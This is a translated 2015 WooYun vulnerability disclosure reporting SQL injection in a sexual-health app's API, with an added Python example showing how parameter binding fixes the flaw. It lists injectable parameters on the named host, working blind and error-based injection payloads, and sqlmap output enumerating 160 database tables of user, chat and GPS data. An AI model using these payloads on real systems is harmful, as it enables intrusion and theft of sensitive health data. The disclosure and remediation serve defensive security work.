
Vulnerability summary

Defect ID: wooyun-2015-0108400

Title: SQL injection in the 两性私人医生 (Private Sexual Health Doctor) app (involves information on over 3 million users)

Vendor: ranknowcn.com

Author: 几何黑店

Submitted: 2015-04-16 17:03

Fixed: 2015-06-01 14:18

Published: 2015-06-01 14:18

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: confirmed by vendor

Source: http://www.wooyun.org; for questions or help, contact [email protected]



Vulnerability details

Disclosure status:

2015-04-16: Details sent to the vendor; awaiting vendor response
2015-04-17: Vendor confirmed; details disclosed to the vendor only
2015-04-27: Details disclosed to core white hats and domain experts
2015-05-07: Details disclosed to regular white hats
2015-05-17: Details disclosed to intern white hats
2015-06-01: Details disclosed to the public

Brief description:

SQL injection in the 两性私人医生 (Private Sexual Health Doctor) app (involves information on over 3 million users)
~so embarrassing~

Details:

POST /client/api.php?randnum=0.8167588198557496 HTTP/1.1
Content-Length: 417
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=qr9m0vochgiek7ojk55ubnp295
Host: medapp.ranknowcn.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 6_0 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A5376e Safari/8536.25
Accept: */*
action=chatnow&doctorid=1&pagename=msg&source=&sourceid=e&sourcetype=reply&userid=&usertype=user


Parameter: doctorid

POST /client/api.php?randnum=0.0867801399435848 HTTP/1.1
Content-Length: 361
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=qr9m0vochgiek7ojk55ubnp295
Host: medapp.ranknowcn.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 6_0 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A5376e Safari/8536.25
Accept: */*
action=login&number=1&password=e&ver=1.3


Parameter: number

POST /client/api.php?randnum=0.0867801399435848 HTTP/1.1
Content-Length: 362
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=qr9m0vochgiek7ojk55ubnp295
Host: medapp.ranknowcn.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 6_0 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A5376e Safari/8536.25
Accept: */*
action=login&number=e&password=admin&ver=1.3


Parameter: password

POST /api/m.php?randnum=0.8685849541798234 HTTP/1.1
Content-Length: 306
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=qr9m0vochgiek7ojk55ubnp295
Host: medapp.ranknowcn.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 6_0 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A5376e Safari/8536.25
Accept: */*
action=chatend&chatid=1


Parameter: chatid

POST /api/m.php?randnum=0.42485142801888287 HTTP/1.1
Content-Length: 356
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=qr9m0vochgiek7ojk55ubnp295
Host: medapp.ranknowcn.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 6_0 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A5376e Safari/8536.25
Accept: */*
action=login&password=e&username=e


Parameter: password

POST /api/m.php?randnum=0.3527681708801538 HTTP/1.1
Content-Length: 344
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=qr9m0vochgiek7ojk55ubnp295
Host: medapp.ranknowcn.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 6_0 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A5376e Safari/8536.25
Accept: */*
action=logout&userid=1


Parameter: userid

POST /api/m.php?randnum=0.42485142801888287 HTTP/1.1
Content-Length: 354
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=qr9m0vochgiek7ojk55ubnp295
Host: medapp.ranknowcn.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 6_0 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A5376e Safari/8536.25
Accept: */*
action=login&password=e&username=admin


Parameter: username

http://medapp.ranknowcn.com/client/image.php?key=e


Parameter: key

Proof of vulnerability:

---
Parameter: doctorid (POST)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
Payload: action=chatnow&doctorid=-5475' OR 4249=4249#&pagename=msg&source=&sourceid=e&sourcetype=reply&userid=&usertype=user
Type: error-based
Title: MySQL OR error-based - WHERE or HAVING clause
Payload: action=chatnow&doctorid=-4478' OR 1 GROUP BY CONCAT(0x716a767671,(SELECT (CASE WHEN (1098=1098) THEN 1 ELSE 0 END)),0x71706b7071,FLOOR(RAND(0)*2)) HAVING MIN(0)#&pagename=msg&source=&sourceid=e&sourcetype=reply&userid=&usertype=user
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT - comment)
Payload: action=chatnow&doctorid=1' AND (SELECT * FROM (SELECT(SLEEP(20)))GXDX)#&pagename=msg&source=&sourceid=e&sourcetype=reply&userid=&usertype=user
---
web application technology: Nginx, PHP 5.3.5
back-end DBMS: MySQL 5.0.12
available databases [3]:
[*] information_schema
[*] lucky_draw
[*] medapp


Database: medapp
[160 tables]
+------------------------------+
| lucky_draw.user_bak1 |
| user |
| activedate |
| addrdetailLog |
| admin |
| adminpage |
| advert |
| advertType |
| answer |
| appnews |
| assign_percentage |
| bj_base_station |
| booking |
| chat |
| chatFilterWords |
| chatUpdLog |
| chatchange |
| chatclose |
| chatcomment |
| chathistory |
| chatlock |
| chatsourceLog |
| chattag |
| chattemp |
| city |
| city2 |
| city2LAC |
| city_baidu |
| cityhospital |
| cityhospital_keshi |
| customerlock |
| dailyStatement |
| doctor |
| doctorBak |
| doctor_autoAssignQuestion |
| doctor_fastreply |
| doctor_fastreplyParent |
| frommsgLog |
| gps_addr |
| gps_addrtag |
| gps_cell |
| gps_imei |
| gps_ios_vars |
| gps_ios_vars_test |
| gps_m7_data |
| gps_move_path |
| gps_notes |
| gps_points |
| gps_points_test |
| gps_pos |
| gps_raw_data |
| gps_user_pic |
| gps_walk_data |
| gps_wifi |
| hospital |
| hospitalSellLog |
| hospitalSellLog_day |
| hospitalSellLog_month |
| hospitalSellLog_oldData |
| hospitalSellLog_sellPrice |
| hospitalSellLog_updLog |
| hospitalSellLog_userTelChat |
| huodong |
| huodongReport |
| importantChatLog |
| ios_xyz |
| ios_xyz2 |
| ios_xyz2_copy |
| ios_xyz2_copy1 |
| ios_xyz2_copy2 |
| ios_xyz_feature |
| ios_xyz_std |
| iospush |
| iospushmsg |
| iospushmsgTemplate |
| iospushmsgType |
| iptable |
| jihuo |
| jihuoCountForDate |
| jihuo_macaddr |
| logs_doctor |
| logs_doctorlogin |
| logs_hospital |
| logs_question |
| logs_quotaQuetsionUserVerify |
| logs_users |
| meiapp_booking |
| meiapp_category |
| meiapp_comment |
| meiapp_favor |
| meiapp_intro |
| meiapp_mm_offer |
| meiapp_mm_photo |
| meiapp_mm_vote |
| meiapp_news |
| meiapp_news_catid |
| meiapp_newscategory |
| meiapp_picture |
| meiapp_project |
| meiapp_share |
| monthlyStatement |
| office |
| online |
| publicQuestion |
| qa_answer |
| qa_keyword |
| qa_question |
| qa_question_answer |
| qa_type |
| question |
| questionCountForDate |
| questionDayNum |
| questionTop |
| questionType |
| questionTypeChild |
| question_all |
| question_repeatLog |
| questionhide |
| quotaHospital |
| quotaQuestion |
| quotaQuestion2 |
| quotaQuestionSearch |
| quotaQuestionSearch_wuxiao |
| quotaQuestion_copy |
| quotaQuestion_test |
| record |
| record_copy |
| regdate |
| retention |
| retention_week |
| roles |
| sellLog |
| sina_weibo_access |
| syslog |
| t_weibo_access |
| tempCode |
| temp_questions |
| test_activity |
| uploadFile |
| user2 |
| userAddrdetail |
| userAlias |
| userBlacklist |
| userContacts |
| userDeviceid |
| userLeaveWords |
| userLog |
| userVisitLog |
| userYanzheng |
| user_copy |
| user_guahao |
| user_guahao_data |
| user_huoyue |
| user_mobilemsg |
| userhide |
| usersource |
| weeklyStatement |
| z_qhp_sell_admin |
| z_qhp_sell_log |
| z_qhp_set_selled |
+------------------------------+


[Image: QQ图片20150416164839.jpg]

Remediation:

You know what to do.

Copyright notice: when reposting, please credit 几何黑店@乌云
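What "you know what to do" means in practice: every parameter listed above (doctorid, chatid, userid, number, username, password, key) is spliced into SQL text, and the fix is to bind it as a query parameter instead. The following is an added example, not code from the report or from the vendor's PHP application; it models the `doctorid` lookup behind `action=chatnow` in Python with an in-memory SQLite database (the real backend is MySQL, and the `doctor` table's columns are assumed), and reuses the report's boolean-based payload with MySQL's `#` comment rewritten as SQLite's `-- ` so it runs offline. The vulnerable lookup returns every doctor row for that input; the bound-parameter lookup returns none, and the validated version never lets the input reach SQL at all.

```python
import re
import sqlite3

# Constructed sample rows standing in for the app's `doctor` table
# (the table name appears in the sqlmap listing above; columns are assumed).
SAMPLE_DOCTORS = [
    (1, "Dr. A", "dermatology"),
    (2, "Dr. B", "urology"),
    (3, "Dr. C", "gynecology"),
]

# The report's boolean-based payload for doctorid, with `#` rewritten as `-- `
# because SQLite does not treat `#` as a comment marker.
REPORT_PAYLOAD = "-5475' OR 4249=4249-- "

DOCTOR_ID_RE = re.compile(r"[0-9]{1,10}")


def make_db():
    """Build the constructed in-memory database used by the demo."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE doctor (id INTEGER PRIMARY KEY, name TEXT, dept TEXT)")
    conn.executemany("INSERT INTO doctor VALUES (?, ?, ?)", SAMPLE_DOCTORS)
    return conn


def chatnow_vulnerable(conn, doctorid):
    """Models the defect: the POST parameter becomes part of the SQL text."""
    sql = "SELECT id, name FROM doctor WHERE id = '%s'" % doctorid
    return conn.execute(sql).fetchall()


def chatnow_bound(conn, doctorid):
    """Same query with the value bound as a parameter: the payload is just data."""
    return conn.execute(
        "SELECT id, name FROM doctor WHERE id = ?", (doctorid,)
    ).fetchall()


def chatnow_hardened(conn, doctorid):
    """Two layers: reject anything that is not a short digit string, then bind.

    Returns None when the input is rejected so the caller can send an error
    response; nothing from a rejected input reaches the database.
    """
    if not DOCTOR_ID_RE.fullmatch(str(doctorid)):
        return None
    return chatnow_bound(conn, int(doctorid))


def demo():
    """Run all three lookups against the constructed data and return the outcomes."""
    conn = make_db()
    return {
        "vulnerable_rows": len(chatnow_vulnerable(conn, REPORT_PAYLOAD)),  # 3: every row leaks
        "bound_rows": len(chatnow_bound(conn, REPORT_PAYLOAD)),            # 0: no match
        "hardened_result": chatnow_hardened(conn, REPORT_PAYLOAD),         # None: rejected
        "hardened_valid": chatnow_hardened(conn, "2"),                     # [(2, "Dr. B")]
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(key, "=", value)
```

Binding is what removes the defect class; input filtering of the kind described in the vendor reply only narrows which strings reach the still-concatenated query, so the validation layer here is an extra control, not a substitute for `?` placeholders (in the PHP app, PDO or MySQLi prepared statements play the same role).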


Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 11

Confirmed at: 2015-04-17 14:17

Vendor reply:

Thanks for the report. During the last cleanup some parameters were not handled. We have now applied global filtering of incoming parameters.

Latest status:

None yet